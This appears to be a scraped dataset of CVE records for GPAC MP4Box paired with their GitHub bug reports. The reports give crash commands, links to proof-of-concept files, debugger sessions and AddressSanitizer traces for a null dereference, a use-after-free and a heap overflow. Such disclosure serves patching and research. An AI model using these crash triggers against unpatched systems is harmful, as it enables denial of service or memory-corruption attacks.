SUMMARY: AddressSanitizer: 515 byte(s) leaked in 5 allocation(s). ```
memory leak
https://api.github.com/repos/rockcarry/ffjpeg/issues/52/comments
1
2022-07-06T08:50:43Z
2023-07-13T01:47:45Z
https://github.com/rockcarry/ffjpeg/issues/52
1,295,485,297
52
CVE-2022-36186
2022-08-17T15:15:08.480
A Null Pointer dereference vulnerability exists in GPAC 2.1-DEV-revUNKNOWN-master via the function gf_filter_pid_set_property_full () at filter_core/filter_pid.c:5250,which causes a Denial of Service (DoS). This vulnerability was fixed in commit b43f9d1.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2223" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.1:dev:*:*:*:*:*:*", "matchCriteriaId": "2963671B-FA29-45DB-80B0-92F9E55F5159", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2223
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [ ] I looked for a similar issue and couldn't find any. - [ ] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [ ] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Description:** `A crash happened on MP4Box(GPAC version 2.1-DEV-revUNKNOWN-master) due to a null pointer dereference vulnerability in gf_filter_pid_set_property_full function (filter_core/filter_pid.c:5250) . ` **MP4Box version** ``` ./MP4Box -version MP4Box - GPAC version 2.1-DEV-revUNKNOWN-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **poc** [poc.zip](https://github.com/gpac/gpac/files/9062544/poc.zip) **command** `./MP4Box -info poc` **crash output** ``` [AVC|H264] Warning: Error parsing NAL unit filter_core/filter_pid.c:5250:6: runtime error: member access within null pointer of type 'struct GF_FilterPid' ``` **gdb output** ``` pwndbg> r Starting program: /home/fuzz/gpac2.1/gpac/bin/gcc/MP4Box -info ../../../test/segv2/poc [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". [AVC|H264] Warning: Error parsing NAL unit filter_core/filter_pid.c:5250:6: runtime error: member access within null pointer of type 'struct GF_FilterPid' [Inferior 1 (process 2239153) exited with code 01] pwndbg> b filter_pid.c:5250 Breakpoint 1 at 0x7ffff4b829f6: filter_pid.c:5250. (6 locations) pwndbg> r Starting program: /home/fuzz/gpac2.1/gpac/bin/gcc/MP4Box -info ../../../test/segv2/poc [Thread debugging using libthread_db enabled] Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1". Breakpoint 1, gf_filter_pid_set_property_full (is_info=GF_FALSE, value=0x7ffffffe9150, dyn_name=0x0, prop_name=0x0, prop_4cc=1347244884, pid=0x613000000040) at filter_core/filter_pid.c:5301 5301 return gf_filter_pid_set_property_full(pid, prop_4cc, NULL, NULL, value, GF_FALSE); LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ REGISTERS ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── RAX 0x0 RBX 0x7ffffffe8f50 ◂— 0x41b58ab3 RCX 0xfffffffd22a ◂— 0x0 RDX 0x7ffffffe9150 ◂— 0x2 RDI 0x613000000040 ◂— 0x613000000040 /* '@' */ RSI 0x504d5354 R8 0x0 R9 0x7ffff58cb4f0 (global_log_tools+496) ◂— 0x2 R10 0x7ffff24ab3f1 ◂— 'gf_filter_pid_set_property' R11 0x7ffff4b84110 (gf_filter_pid_set_property) ◂— endbr64 R12 0x613000000040 ◂— 0x613000000040 /* '@' */ R13 0x7ffffffe9150 ◂— 0x2 R14 0x504d5354 R15 0xfffffffd1ea ◂— 0x0 RBP 0x7ffffffe9060 —▸ 0x7ffffffe9380 —▸ 0x7ffffffea0d0 —▸ 0x7ffffffea170 —▸ 0x7ffffffea280 ◂— ... RSP 0x7ffffffe8f30 ◂— 0x0 RIP 0x7ffff4b841c6 (gf_filter_pid_set_property+182) ◂— test r12, r12 ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ DISASM ]────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── ► 0x7ffff4b841c6 <gf_filter_pid_set_property+182> test r12, r12 0x7ffff4b841c9 <gf_filter_pid_set_property+185> je gf_filter_pid_set_property+1477 <gf_filter_pid_set_property+1477> 0x7ffff4b841cf <gf_filter_pid_set_property+191> test r12b, 7 0x7ffff4b841d3 <gf_filter_pid_set_property+195> jne gf_filter_pid_set_property+1477 <gf_filter_pid_set_property+1477> 0x7ffff4b841d9 <gf_filter_pid_set_property+201> mov rax, r12 0x7ffff4b841dc <gf_filter_pid_set_property+204> shr rax, 3 0x7ffff4b841e0 <gf_filter_pid_set_property+208> cmp byte ptr [rax + 0x7fff8000], 0 0x7ffff4b841e7 <gf_filter_pid_set_property+215> jne gf_filter_pid_set_property+1447 <gf_filter_pid_set_property+1447> 0x7ffff4b841ed <gf_filter_pid_set_property+221> cmp r12, qword ptr [r12] 0x7ffff4b841f1 <gf_filter_pid_set_property+225> jne gf_filter_pid_set_property+1016 <gf_filter_pid_set_property+1016> 0x7ffff4b841f7 <gf_filter_pid_set_property+231> mov esi, r14d ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ SOURCE (CODE) ]─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── In file: /home/fuzz/gpac2.1/gpac/src/filter_core/filter_pid.c 5296 5297 GF_EXPORT 5298 GF_Err gf_filter_pid_set_property(GF_FilterPid *pid, u32 prop_4cc, const GF_PropertyValue *value) 5299 { 5300 if (!prop_4cc) return GF_BAD_PARAM; ► 5301 return gf_filter_pid_set_property_full(pid, prop_4cc, NULL, NULL, value, GF_FALSE); 5302 } 5303 5304 GF_EXPORT 5305 GF_Err gf_filter_pid_set_property_str(GF_FilterPid *pid, const char *name, const GF_PropertyValue *value) 5306 { ──────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ STACK ]─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── 00:0000│ rsp 0x7ffffffe8f30 ◂— 0x0 01:0008│ 0x7ffffffe8f38 ◂— 0x0 02:0010│ 0x7ffffffe8f40 —▸ 0x7ffffffe9030 —▸ 0x7ffff54af2c0 ◂— 0x6372636170672e /* '.gpacrc' */ 03:0018│ 0x7ffffffe8f48 —▸ 0x7ffffffe8f50 ◂— 0x41b58ab3 04:0020│ rbx 0x7ffffffe8f50 ◂— 0x41b58ab3 05:0028│ 0x7ffffffe8f58 —▸ 0x7ffff5640eff ◂— '1 48 100 11 szName:5290' 06:0030│ 0x7ffffffe8f60 —▸ 0x7ffff4b84110 (gf_filter_pid_set_property) ◂— endbr64 07:0038│ 0x7ffffffe8f68 —▸ 0x618000000c80 —▸ 0x7ffff6de03e0 (FileInRegister) —▸ 0x7ffff56a6580 ◂— 0x6e6966 /* 'fin' */ ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────[ BACKTRACE ]───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── ► f 0 0x7ffff4b841c6 gf_filter_pid_set_property+182 f 1 0x7ffff4b841c6 gf_filter_pid_set_property+182 f 2 0x7ffff4c06993 gf_filter_pid_raw_new+595 f 3 0x7ffff4dc30b1 filein_process+2721 f 4 0x7ffff4c0eb6d gf_filter_process_task+3581 f 5 0x7ffff4bd4953 gf_fs_thread_proc+2275 f 6 0x7ffff4be0c67 gf_fs_run+455 f 7 0x7ffff462a677 gf_media_import+10263 ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── ────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── pwndbg> bt #0 gf_filter_pid_set_property_full (is_info=GF_FALSE, value=0x7ffffffe9150, dyn_name=0x0, prop_name=0x0, prop_4cc=1347244884, pid=0x613000000040) at filter_core/filter_pid.c:5301 #1 gf_filter_pid_set_property (pid=pid@entry=0x613000000040, prop_4cc=prop_4cc@entry=1347244884, value=0x7ffffffe9150) at filter_core/filter_pid.c:5301 #2 0x00007ffff4c06993 in gf_filter_pid_raw_new (filter=filter@entry=0x618000000c80, url=0x603000000f40 "../../../test/segv2/poc", local_file=<optimized out>, mime_type=<optimized out>, fext=<optimized out>, probe_data=<optimized out>, probe_size=<optimized out>, trust_mime=<optimized out>, out_pid=<optimized out>) at filter_core/filter.c:3891 #3 0x00007ffff4dc30b1 in filein_process (filter=<optimized out>) at filters/in_file.c:481 #4 0x00007ffff4c0eb6d in gf_filter_process_task (task=0x607000000b10) at filter_core/filter.c:2639 #5 0x00007ffff4bd4953 in gf_fs_thread_proc (sess_thread=sess_thread@entry=0x616000000110) at filter_core/filter_session.c:1857 #6 0x00007ffff4be0c67 in gf_fs_run (fsess=fsess@entry=0x616000000080) at filter_core/filter_session.c:2118 #7 0x00007ffff462a677 in gf_media_import (importer=importer@entry=0x7ffffffeaa50) at media_tools/media_import.c:1226 #8 0x0000555555651a12 in convert_file_info (inName=<optimized out>, track_id=0x555555764fb0 <info_track_id>) at fileimport.c:130 #9 0x000055555562279f in mp4box_main (argc=<optimized out>, argv=<optimized out>) at mp4box.c:6265 #10 0x00007ffff1949083 in __libc_start_main (main=0x5555555f6a00 <main>, argc=3, argv=0x7fffffffe488, init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe478) at ../csu/libc-start.c:308 #11 0x00005555555f6afe in _start () at mp4box.c:6811 pwndbg> p pid $2 = (GF_FilterPid *) 0x613000000040 pwndbg> c Continuing. [AVC|H264] Warning: Error parsing NAL unit Breakpoint 1, gf_filter_pid_set_property_full (is_info=GF_FALSE, value=0x7ffffffe9810, dyn_name=0x0, prop_name=0x0, prop_4cc=1146050121, pid=0x0) at filter_core/filter_pid.c:5301 5301 return gf_filter_pid_set_property_full(pid, prop_4cc, NULL, NULL, value, GF_FALSE); LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA ............ until....... pwndbg> p pid $3 = (GF_FilterPid *) 0x0 pwndbg> i b Num Type Disp Enb Address What 1 breakpoint keep y <MULTIPLE> breakpoint already hit 9 times 1.1 y 0x00007ffff4b829f6 in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250 1.2 y 0x00007ffff4b8314e in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250 1.3 y 0x00007ffff4b834d1 in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250 1.4 y 0x00007ffff4b8393e in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250 1.5 y 0x00007ffff4b83cc1 in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250 1.6 y 0x00007ffff4b841c6 in gf_filter_pid_set_property_full at filter_core/filter_pid.c:5250 pwndbg> n filter_core/filter_pid.c:5250:6: runtime error: member access within null pointer of type 'struct GF_FilterPid' [Inferior 1 (process 2239158) exited with code 01] ``` **source code** ``` 5246 static GF_Err gf_filter_pid_set_property_full(GF_FilterPid *pid, u32 prop_4cc, const char *prop_name, char *dyn_name, const GF_PropertyValue *value, Bool is_info) 5247 { 5248 GF_PropertyMap *map; 5249 const GF_PropertyValue *oldp; 5250 if (PID_IS_INPUT(pid)) { //**here**// 5251 GF_LOG(GF_LOG_ERROR, GF_LOG_FILTER, ("Attempt to write property on input PID in filter %s - ignoring\n", pid->filter->name)); 5252 return GF_BAD_PARAM; 5253 } ```
A NULL pointer dereference in gf_filter_pid_set_property_full
https://api.github.com/repos/gpac/gpac/issues/2223/comments
0
2022-07-07T10:26:55Z
2022-07-12T17:13:11Z
https://github.com/gpac/gpac/issues/2223
1,297,164,642
2,223
CVE-2022-36190
2022-08-17T15:15:08.543
GPAC mp4box 2.1-DEV-revUNKNOWN-master has a use-after-free vulnerability in function gf_isom_dovi_config_get. This vulnerability was fixed in commit fef6242.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2220" }, { "source": "[email protected]", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2220
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [ ] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Description** `Heap use after free in fuction gf_isom_dovi_config_get located in isomedia/avc_ext.c:2490` **System info** `ubuntu 20.04 lts` **version info:** ``` ./MP4Box -version MP4Box - GPAC version 2.1-DEV-revUNKNOWN-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **compile** ``` ./configure --enable-sanitizer make ``` **crash command:** `./MP4Box -info poc` **poc :** [poc.zip](https://github.com/gpac/gpac/files/9051242/poc.zip) **Crash output:** ``` [iso file] Unknown box type mp4u in parent stsd [iso file] extra box maxr found in hinf, deleting [iso file] extra box maxr found in hinf, deleting [iso file] Unknown box type 80rak in parent moov [iso file] Unknown box type drzf in parent dinf [iso file] Missing dref box in dinf [iso file] Incomplete box mdat - start 11495 size 853076 [iso file] Incomplete file while reading for dump - aborting parsing # Movie Info - 5 tracks - TimeScale 90000 Duration 00:00:22.839 (recomputed 00:00:22.848) Fragmented: no Progressive (moov before mdat) Major Brand isom - version 1 - compatible brands: Created: GMT Wed Sep 14 06:08:31 2078 Modified: GMT Wed Sep 14 06:08:33 2078 File has root IOD (96 bytes) Scene PL 0xff - Graphics PL 0xff - OD PL 0xff Visual PL: Simple Profile @ Level 1 (0x01) Audio PL: High Quality Audio Profile @ Level 2 (0x0f) 1 UDTA types: hnti: # Track 1 Info - ID 1 - TimeScale 90000 Media Duration 00:00:22.800 Track flags: Enabled Media Info: Language "Undetermined (und)" - Type "vide:mp4u" - 342 samples Visual Sample Entry Info: width=176 height=144 (depth=24 bits) Visual Track layout: x=0 y=0 width=176 height=144 ================================================================= ==2234976==ERROR: AddressSanitizer: heap-use-after-free on address 0x60f000000130 at pc 0x7fbba822fbc0 bp 0x7ffe87b46740 sp 0x7ffe87b46730 READ of size 8 at 0x60f000000130 thread T0 #0 0x7fbba822fbbf in gf_isom_dovi_config_get isomedia/avc_ext.c:2490 #1 0x55f3db03107a in DumpTrackInfo /home/fuzz/gpac2.1/gpac/applications/mp4box/filedump.c:2862 #2 0x55f3db03ea17 in DumpMovieInfo /home/fuzz/gpac2.1/gpac/applications/mp4box/filedump.c:3994 #3 0x55f3db012ad0 in mp4box_main /home/fuzz/gpac2.1/gpac/applications/mp4box/mp4box.c:6367 #4 0x7fbba58ed082 in __libc_start_main ../csu/libc-start.c:308 #5 0x55f3dafe7afd in _start (/home/fuzz/gpac2.1/gpac/bin/gcc/MP4Box+0xa2afd) 0x60f000000130 is located 0 bytes inside of 168-byte region [0x60f000000130,0x60f0000001d8) freed by thread T0 here: #0 0x7fbbab63440f in __interceptor_free ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:122 #1 0x7fbba825252d in unkn_box_read isomedia/box_code_base.c:793 #2 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #3 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #4 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753 #5 0x7fbba82524fb in unkn_box_read isomedia/box_code_base.c:789 #6 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #7 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #8 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753 #9 0x7fbba82524fb in unkn_box_read isomedia/box_code_base.c:789 #10 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #11 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #12 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753 #13 0x7fbba82524fb in unkn_box_read isomedia/box_code_base.c:789 #14 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #15 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #16 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753 #17 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #18 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #19 0x7fbba8302a35 in gf_isom_parse_root_box isomedia/box_funcs.c:38 #20 0x7fbba832babc in gf_isom_parse_movie_boxes_internal isomedia/isom_intern.c:373 #21 0x7fbba8331c2f in gf_isom_parse_movie_boxes isomedia/isom_intern.c:860 #22 0x7fbba8331c2f in gf_isom_open_file isomedia/isom_intern.c:980 #23 0x55f3db00c549 in mp4box_main /home/fuzz/gpac2.1/gpac/applications/mp4box/mp4box.c:6181 #24 0x7fbba58ed082 in __libc_start_main ../csu/libc-start.c:308 previously allocated by thread T0 here: #0 0x7fbbab634808 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cc:144 #1 0x7fbba82521ef in unkn_box_read isomedia/box_code_base.c:768 #2 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #3 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #4 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753 #5 0x7fbba82524fb in unkn_box_read isomedia/box_code_base.c:789 #6 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #7 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #8 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753 #9 0x7fbba82524fb in unkn_box_read isomedia/box_code_base.c:789 #10 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #11 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #12 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753 #13 0x7fbba82524fb in unkn_box_read isomedia/box_code_base.c:789 #14 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #15 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #16 0x7fbba830615a in gf_isom_box_array_read isomedia/box_funcs.c:1753 #17 0x7fbba83015e3 in gf_isom_box_read isomedia/box_funcs.c:1860 #18 0x7fbba83015e3 in gf_isom_box_parse_ex isomedia/box_funcs.c:271 #19 0x7fbba8302a35 in gf_isom_parse_root_box isomedia/box_funcs.c:38 #20 0x7fbba832babc in gf_isom_parse_movie_boxes_internal isomedia/isom_intern.c:373 #21 0x7fbba8331c2f in gf_isom_parse_movie_boxes isomedia/isom_intern.c:860 #22 0x7fbba8331c2f in gf_isom_open_file isomedia/isom_intern.c:980 #23 0x55f3db00c549 in mp4box_main /home/fuzz/gpac2.1/gpac/applications/mp4box/mp4box.c:6181 #24 0x7fbba58ed082 in __libc_start_main ../csu/libc-start.c:308 SUMMARY: AddressSanitizer: heap-use-after-free isomedia/avc_ext.c:2490 in gf_isom_dovi_config_get Shadow bytes around the buggy address: 0x0c1e7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c1e7fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa =>0x0c1e7fff8020: fa fa fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd 0x0c1e7fff8030: fd fd fd fd fd fd fd fd fd fd fd fa fa fa fa fa 0x0c1e7fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c1e7fff8070: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2234976==ABORTING ``` **Impact** can cause a program to crash, use unexpected values, or execute code. Occurrences: avc_ext.c:2490 ps: this test was still based on the newest mp4box+asan. The bug happened in avc_ext.c:2490 which was the same location with the other issue i submitted (https://github.com/gpac/gpac/issues/2218). Maybe asan mistakenly reports "heap-use-after-free" instead of "heap-buffer-overflow". Pls check it again.
Heap Use After Free in function gf_isom_dovi_config_get
https://api.github.com/repos/gpac/gpac/issues/2220/comments
1
2022-07-06T03:36:02Z
2022-07-12T17:13:50Z
https://github.com/gpac/gpac/issues/2220
1,295,074,577
2,220
CVE-2022-36191
2022-08-17T16:15:07.920
A heap-buffer-overflow had occurred in function gf_isom_dovi_config_get of isomedia/avc_ext.c:2490, as demonstrated by MP4Box. This vulnerability was fixed in commit fef6242.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/2218" }, { "source": "[email protected]", "tags": null, "url": "https://www.debian.org/security/2023/dsa-5411" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:*:*:*:*:*:*:*:*", "matchCriteriaId": "B4D3D58A-C3C9-4441-A84A-FB91FD19985C", "versionEndExcluding": "2.2.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/gpac/gpac/issues/2218
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! - [ ] I looked for a similar issue and couldn't find any. - [x] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ - [x] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ **Description** A heap-buffer-overflow has occurred in function gf_isom_dovi_config_get of isomedia/avc_ext.c:2490 when running program MP4Box,this can reproduce on the lattest commit. **version info** ``` fuzz@ubuntu:~/gpac2.1/gpac/bin/gcc$ ./MP4Box -version MP4Box - GPAC version 2.1-DEV-revUNKNOWN-master (c) 2000-2022 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: --enable-sanitizer Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_LINUX_DVB GPAC_DISABLE_3D ``` **crash command** ` ./MP4Box -info poc1` **crash output** ``` [iso file] Unknown box type 00000200 in parent stsd # Movie Info - 1 track - TimeScale 1000 Duration 00:00:10.000 (recomputed 4 Days, 14:43:47.879) Fragmented: no Major Brand mp4@ - version 0 - compatible brands: mp42 mp41 isom iso2 Created: GMT Thu Apr 26 09:02:13 2012 # Track 1 Info - ID 1 - TimeScale 3000 Media Duration 00:00:10.000 (recomputed 4 Days, 14:43:47.879) Track flags: Enabled In Movie In Preview Media Info: Language "Undetermined (und)" - Type "vide:00000200" - 300 samples Visual Sample Entry Info: width=320 height=240 (depth=24 bits) Visual Track layout: x=0 y=0 width=320 height=240 ================================================================= ==2235126==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60f000000130 at pc 0x7ff2a69b3bc0 bp 0x7fff43da89f0 sp 0x7fff43da89e0 READ of size 8 at 0x60f000000130 thread T0 #0 0x7ff2a69b3bbf in gf_isom_dovi_config_get isomedia/avc_ext.c:2490 #1 0x56165102107a in DumpTrackInfo /home/fuzz/gpac2.1/gpac/applications/mp4box/filedump.c:2862 #2 0x56165102ea17 in DumpMovieInfo /home/fuzz/gpac2.1/gpac/applications/mp4box/filedump.c:3994 #3 0x561651002ad0 in mp4box_main /home/fuzz/gpac2.1/gpac/applications/mp4box/mp4box.c:6367 #4 0x7ff2a4071082 in __libc_start_main ../csu/libc-start.c:308 #5 0x561650fd7afd in _start (/home/fuzz/gpac2.1/gpac/bin/gcc/MP4Box+0xa2afd) Address 0x60f000000130 is a wild pointer. SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/avc_ext.c:2490 in gf_isom_dovi_config_get Shadow bytes around the buggy address: 0x0c1e7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c1e7fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00 0x0c1e7fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa =>0x0c1e7fff8020: fa fa fa fa 